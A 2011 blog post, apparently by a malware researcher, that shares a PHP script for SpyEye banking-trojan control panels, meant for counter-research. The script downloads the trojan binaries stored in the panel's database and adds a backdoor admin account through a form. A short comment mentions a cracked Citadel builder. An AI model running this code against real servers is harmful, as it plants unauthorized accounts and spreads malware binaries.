Friday 9 September 2011

SpyEye v1.3.x mainpanel: Download binaries/Make users

Finally done, a php page for download SpyEye binaries from the database and add an user if needed.
all you have to do is to fill the good maincp db infos.

<?php
// Xyl2k :þ
// Thanks to EsSandre for the additional help.

    $MySQLI = array();
   
    /* MySQLI ID */
   
    $MySQLI['HOST'] = 'localhost';
    $MySQLI['USER'] = 'root';
    $MySQLI['PASS'] = 'toor';
    $MySQLI['DB'] = 'maincp';
   
    function str_error($error)
    {
        print '<p style="color:red;">'.htmlentities($error).'</p>';
    }
   
    function download_binary($path_file, $buf)
    {
        header("Pragma: public");
        header("Expires: 0");
        header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
        header("Cache-Control: private", false);
        header("Content-Type: application/octet-stream");
        header("Content-Disposition: attachment; filename=\"".basename($path_file)."\";" );

        header("Content-Transfer-Encoding: binary");
        header("Content-Length: ".strlen($buf));
       
        echo $buf;
    }
   
    $mysqli = new mysqli($MySQLI['HOST'], $MySQLI['USER'], $MySQLI['PASS'], $MySQLI['DB']);
 
   if (isset($_POST['register_submit']))
    {
        unset($_GET['id']);
        if (isset($_POST['user']) && !is_array($_POST['user']) && !empty($_POST['user']))
        {
            if (isset($_POST['password']) && !is_array($_POST['password']) && !empty($_POST['password']))
            {
                if (trim($_POST['user']) == '' || trim($_POST['password']) == '')
                    str_error('An error has occurred');
                else
                {
                    $user = mysql_real_escape_string($_POST['user']);
                    $password = md5($_POST['password']);
                    $mysqli->query("INSERT INTO users_t VALUES('', '".$user."', '".$password."', '', '')");
                    echo '<p style="color:green;">User added successfully</p>';
                }
            }
            else
                str_error('An error has occurred');
        }
        else
            str_error('An error has occurred');
    }
 
    if (mysqli_connect_errno())
        die(str_error('MySQLI Connect : '.mysqli_connect_error()));
   
    if (isset($_GET['id']) && !empty($_GET['id']) && !is_array($_GET['id']))
    {
        if (is_numeric($_GET['id']) && $_GET['id'] > 0)
        {
            $id = $_GET['id'];
            $sql = $mysqli->query('SELECT fName, fCont FROM files_t WHERE fId=\''.$id.'\'');
            if ($sql->num_rows)
            {
                $_sql = $sql->fetch_array(MYSQLI_ASSOC);
                download_binary($_sql['fName'], $_sql['fCont']);
            }
            else
                str_error('Invalid file');
        }
        else
            str_error('Invalid file');
    }
    else
    {
        echo '<h3>Add an Admin Account</h3><br />
            <form action="'
.basename($_SERVER['PHP_SELF']).'" method="POST">
            <label for="user">Username</label><br /><input name="user" type="text"/><br /><br />
            <label for="user">Password</label><br /><input name="password" type="password"/><br /><br />
            <input name="register_submit" value="Register" type="submit"/>
            </form>'
;
     
        $sql = $mysqli->query('SELECT fId, fName, fCont FROM files_t');
        if (!$sql)
            die(str_error('MySQLI :: Query error : '.$mysqli->error));
       
        echo "\n<h3>List of available file in database</h3><br />\n";
       
        while($row = $sql->fetch_array(MYSQLI_ASSOC))
        {
            echo "<a href=\"".basename($_SERVER['PHP_SELF'])."?id=".$row['fId']."\">".htmlentities($row['fName'])."</a><br /><br />\n";
        }
    }
    mysqli_close($mysqli);
?>


main panel, no feature for download binaries, or add an user:


Database structure (mainpanel)

This code was made for help good guys to get easilly SpyEye binaries and for create backdoored user, not to help criminals.
Hacking SpyEye is a thing relatively simple, c'mon :)

2 comments:

  1. Great work bro .. I love you talent but a cracked citadel builder is still a big challenge for you.

    ReplyDelete